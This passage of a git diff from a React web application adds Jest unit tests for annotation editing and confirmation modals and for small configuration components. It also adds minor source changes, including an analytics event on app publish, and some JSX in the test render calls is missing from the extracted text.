Reproduction', () => { // Capture console errors const originalError = console.error diff --git a/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..356f813afc --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,53 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import EditItem, { EditItemType } from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +describe('AddAnnotationModal/EditItem', () => { + test('should render query inputs with user avatar and placeholder strings', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.queryName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toBeInTheDocument() + expect(screen.getByText('Why?')).toBeInTheDocument() + }) + + test('should render answer name and placeholder text', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.answerName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toBeInTheDocument() + expect(screen.getByDisplayValue('Existing answer')).toBeInTheDocument() + }) + + test('should propagate changes when answer content updates', () => { + const handleChange = jest.fn() + render( + , + ) + + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { target: { value: 'Because' } }) + expect(handleChange).toHaveBeenCalledWith('Because') + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..3103e3c96d --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx @@ -0,0 +1,155 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import AddAnnotationModal from './index' +import { useProviderContext } from '@/context/provider-context' + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +const mockToastNotify = jest.fn() +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(args => mockToastNotify(args)), + }, +})) + +jest.mock('@/app/components/billing/annotation-full', () => () =>
) + +const mockUseProviderContext = useProviderContext as jest.Mock + +const getProviderContext = ({ usage = 0, total = 10, enableBilling = false } = {}) => ({ + plan: { + usage: { annotatedResponse: usage }, + total: { annotatedResponse: total }, + }, + enableBilling, +}) + +describe('AddAnnotationModal', () => { + const baseProps = { + isShow: true, + onHide: jest.fn(), + onAdd: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + mockUseProviderContext.mockReturnValue(getProviderContext()) + }) + + const typeQuestion = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder'), { + target: { value }, + }) + } + + const typeAnswer = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { + target: { value }, + }) + } + + test('should render modal title when drawer is visible', () => { + render() + + expect(screen.getByText('appAnnotation.addModal.title')).toBeInTheDocument() + }) + + test('should capture query input text when typing', () => { + render() + typeQuestion('Sample question') + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('Sample question') + }) + + test('should capture answer input text when typing', () => { + render() + typeAnswer('Sample answer') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('Sample answer') + }) + + test('should show annotation full notice and disable submit when quota exceeded', () => { + mockUseProviderContext.mockReturnValue(getProviderContext({ usage: 10, total: 10, enableBilling: true })) + render() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.add' })).toBeDisabled() + }) + + test('should call onAdd with form values when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + fireEvent.click(screen.getByTestId('checkbox-create-next-checkbox')) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(onAdd).toHaveBeenCalledWith({ question: 'Question value', answer: 'Answer value' }) + }) + + test('should reset fields after saving when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + const createNextToggle = screen.getByText('appAnnotation.addModal.createNext').previousElementSibling as HTMLElement + fireEvent.click(createNextToggle) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + await waitFor(() => { + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('') + }) + }) + + test('should show toast when validation fails for missing question', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.queryRequired', + })) + }) + + test('should show toast when validation fails for missing answer', () => { + render() + typeQuestion('Filled question') + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.answerRequired', + })) + }) + + test('should close modal when save completes and create next unchecked', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Q') + typeAnswer('A') + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(baseProps.onHide).toHaveBeenCalled() + }) + + test('should allow cancel button to close the drawer', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + expect(baseProps.onHide).toHaveBeenCalled() + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.tsx b/web/app/components/app/annotation/add-annotation-modal/index.tsx index 274a57adf1..0ae4439531 100644 --- a/web/app/components/app/annotation/add-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/add-annotation-modal/index.tsx @@ -101,7 +101,7 @@ const AddAnnotationModal: FC = ({
- setIsCreateNext(!isCreateNext)} /> + setIsCreateNext(!isCreateNext)} />
{t('appAnnotation.addModal.createNext')}
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx index 91e1e9d8fe..d94295c31c 100644 --- a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx @@ -3,12 +3,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react' import CSVUploader, { type Props } from './csv-uploader' import { ToastContext } from '@/app/components/base/toast' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - describe('CSVUploader', () => { const notify = jest.fn() const updateFile = jest.fn() diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..1f32e55928 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,397 @@ +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import EditItem, { EditItemType, EditTitle } from './index' + +describe('EditTitle', () => { + it('should render title content correctly', () => { + // Arrange + const props = { title: 'Test Title' } + + // Act + render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + // Should contain edit icon (svg element) + expect(document.querySelector('svg')).toBeInTheDocument() + }) + + it('should apply custom className when provided', () => { + // Arrange + const props = { + title: 'Test Title', + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) +}) + +describe('EditItem', () => { + const defaultProps = { + type: EditItemType.Query, + content: 'Test content', + onSave: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render content correctly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + // Should show item name (query or answer) + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + + it('should render different item types correctly', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Answer, + content: 'Answer content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/answer content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument() + }) + + it('should show edit controls when not readonly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should hide edit controls when readonly', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should respect readonly prop for edit functionality', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + + it('should display provided content', () => { + // Arrange + const props = { + ...defaultProps, + content: 'Custom content for testing', + } + + // Act + render() + + // Assert + expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument() + }) + + it('should render appropriate content based on type', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Query, + content: 'Question content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/question content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should activate edit mode when edit button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument() + }) + + it('should save new content when save button is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Type new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Updated content') + }) + + it('should exit edit mode when cancel button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText(/test content/i)).toBeInTheDocument() + }) + + it('should show content preview while typing', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Assert + expect(screen.getByText(/new content/i)).toBeInTheDocument() + }) + + it('should call onSave with correct content when saving', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Test save content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Test save content') + }) + + it('should show delete option when content changes', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and change content + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to trigger content change + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Modified content') + }) + + it('should handle keyboard interactions in edit mode', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + + // Test typing + await user.type(textarea, 'Keyboard test') + + // Assert + expect(textarea).toHaveValue('Keyboard test') + expect(screen.getByText(/keyboard test/i)).toBeInTheDocument() + }) + }) + + // State Management + describe('State Management', () => { + it('should reset newContent when content prop changes', async () => { + // Arrange + const { rerender } = render() + + // Act - Enter edit mode and type something + const user = userEvent.setup() + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New content') + + // Rerender with new content prop + rerender() + + // Assert - Textarea value should be reset due to useEffect + expect(textarea).toHaveValue('') + }) + + it('should preserve edit state across content changes', async () => { + // Arrange + const { rerender } = render() + const user = userEvent.setup() + + // Act - Enter edit mode + await user.click(screen.getByText('common.operation.edit')) + + // Rerender with new content + rerender() + + // Assert - Should still be in edit mode + expect(screen.getByRole('textbox')).toBeInTheDocument() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty content', () => { + // Arrange + const props = { + ...defaultProps, + content: '', + } + + // Act + const { container } = render() + + // Assert - Should render without crashing + // Check that the component renders properly with empty content + expect(container.querySelector('.grow')).toBeInTheDocument() + // Should still show edit button + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longContent = 'A'.repeat(1000) + const props = { + ...defaultProps, + content: longContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(longContent)).toBeInTheDocument() + }) + + it('should handle content with special characters', () => { + // Arrange + const specialContent = 'Content with & < > " \' characters' + const props = { + ...defaultProps, + content: specialContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialContent)).toBeInTheDocument() + }) + + it('should handle rapid edit/cancel operations', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + // Rapid edit/cancel operations + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText('Test content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..a2e2527605 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx @@ -0,0 +1,408 @@ +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast' +import EditAnnotationModal from './index' + +// Mock only external dependencies +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + editAnnotation: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 5 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }), +})) + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: () => '2023-12-01 10:30:00', + }), +})) + +// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type ToastNotifyProps = Pick +type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle } +const toastWithNotify = Toast as unknown as ToastWithNotify +const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() }) + +const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as { + addAnnotation: jest.Mock + editAnnotation: jest.Mock +} + +describe('EditAnnotationModal', () => { + const defaultProps = { + isShow: true, + onHide: jest.fn(), + appId: 'test-app-id', + query: 'Test query', + answer: 'Test answer', + onEdited: jest.fn(), + onAdded: jest.fn(), + onRemove: jest.fn(), + } + + afterAll(() => { + toastNotifySpy.mockRestore() + }) + + beforeEach(() => { + jest.clearAllMocks() + mockAddAnnotation.mockResolvedValue({ + id: 'test-id', + account: { name: 'Test User' }, + }) + mockEditAnnotation.mockResolvedValue({}) + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render modal when isShow is true', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Check for modal title as it appears in the mock + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument() + }) + + it('should display query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Look for query and answer content + expect(screen.getByText('Test query')).toBeInTheDocument() + expect(screen.getByText('Test answer')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should handle different query and answer content', () => { + // Arrange + const props = { + ...defaultProps, + query: 'Custom query content', + answer: 'Custom answer content', + } + + // Act + render() + + // Assert - Check content is displayed + expect(screen.getByText('Custom query content')).toBeInTheDocument() + expect(screen.getByText('Custom answer content')).toBeInTheDocument() + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Remove option should be present (using pattern) + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should enable editing for query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Edit links should be visible (using text content) + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(2) + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + + it('should save content when edited', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'New query content', + answer: 'Test answer', + message_id: undefined, + }) + }) + }) + + // API Calls + describe('API Calls', () => { + it('should call addAnnotation when saving new annotation', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock the API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'Updated query', + answer: 'Test answer', + message_id: undefined, + }) + }) + + it('should call editAnnotation when updating existing annotation', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockEditAnnotation).toHaveBeenCalledWith( + 'test-app-id', + 'test-annotation-id', + { + message_id: 'test-message-id', + question: 'Modified query', + answer: 'Test answer', + }, + ) + }) + }) + + // State Management + describe('State Management', () => { + it('should initialize with closed confirm modal', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Confirm dialog should not be visible initially + expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument() + }) + + it('should show confirm modal when remove is clicked', async () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Assert - Confirmation dialog should appear + expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + }) + + it('should call onRemove when removal is confirmed', async () => { + // Arrange + const mockOnRemove = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + onRemove: mockOnRemove, + } + const user = userEvent.setup() + + // Act + render() + + // Click remove + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Click confirm + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + // Assert + expect(mockOnRemove).toHaveBeenCalled() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty query and answer', () => { + // Arrange + const props = { + ...defaultProps, + query: '', + answer: '', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longQuery = 'Q'.repeat(1000) + const longAnswer = 'A'.repeat(1000) + const props = { + ...defaultProps, + query: longQuery, + answer: longAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(longQuery)).toBeInTheDocument() + expect(screen.getByText(longAnswer)).toBeInTheDocument() + }) + + it('should handle special characters in content', () => { + // Arrange + const specialQuery = 'Query with & < > " \' characters' + const specialAnswer = 'Answer with & < > " \' characters' + const props = { + ...defaultProps, + query: specialQuery, + answer: specialAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialQuery)).toBeInTheDocument() + expect(screen.getByText(specialAnswer)).toBeInTheDocument() + }) + + it('should handle onlyEditResponse prop', () => { + // Arrange + const props = { + ...defaultProps, + onlyEditResponse: true, + } + + // Act + render() + + // Assert - Query should be readonly, answer should be editable + const editLinks = screen.queryAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(1) // Only answer should have edit button + }) + }) +}) diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('RemoveAnnotationConfirmModal', () => { + // Rendering behavior driven by isShow and translations + describe('Rendering', () => { + test('should display the confirm modal when visible', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Remove annotation?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render modal content when hidden', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Remove annotation?')).not.toBeInTheDocument() + }) + }) + + // User interactions with confirm and cancel buttons + describe('Interactions', () => { + test('should call onHide when cancel button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onRemove).not.toHaveBeenCalled() + }) + + test('should call onRemove when confirm button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onRemove).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/app-publisher/index.tsx b/web/app/components/app/app-publisher/index.tsx index 2dc45e1337..5aea337f85 100644 --- a/web/app/components/app/app-publisher/index.tsx +++ b/web/app/components/app/app-publisher/index.tsx @@ -51,6 +51,7 @@ import { AppModeEnum } from '@/types/app' import type { PublishWorkflowParams } from '@/types/workflow' import { basePath } from '@/utils/var' import UpgradeBtn from '@/app/components/billing/upgrade-btn' +import { trackEvent } from '@/app/components/base/amplitude' const ACCESS_MODE_MAP: Record = { [AccessMode.ORGANIZATION]: { @@ -189,11 +190,12 @@ const AppPublisher = ({ try { await onPublish?.(params) setPublished(true) + trackEvent('app_published_time', { action_mode: 'app', app_id: appDetail?.id, app_name: appDetail?.name }) } catch { setPublished(false) } - }, [onPublish]) + }, [appDetail, onPublish]) const handleRestore = useCallback(async () => { try { diff --git a/web/app/components/app/configuration/base/group-name/index.spec.tsx b/web/app/components/app/configuration/base/group-name/index.spec.tsx new file mode 100644 index 0000000000..ac504247f2 --- /dev/null +++ b/web/app/components/app/configuration/base/group-name/index.spec.tsx @@ -0,0 +1,21 @@ +import { render, screen } from '@testing-library/react' +import GroupName from './index' + +describe('GroupName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render name when provided', () => { + // Arrange + const title = 'Inputs' + + // Act + render() + + // Assert + expect(screen.getByText(title)).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx new file mode 100644 index 0000000000..615a1769e8 --- /dev/null +++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx @@ -0,0 +1,70 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import OperationBtn from './index' + +jest.mock('@remixicon/react', () => ({ + RiAddLine: (props: { className?: string }) => ( + + ), + RiEditLine: (props: { className?: string }) => ( + + ), +})) + +describe('OperationBtn', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering icons and translation labels + describe('Rendering', () => { + it('should render passed custom class when provided', () => { + // Arrange + const customClass = 'custom-class' + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass) + }) + it('should render add icon when type is add', () => { + // Arrange + const onClick = jest.fn() + + // Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) 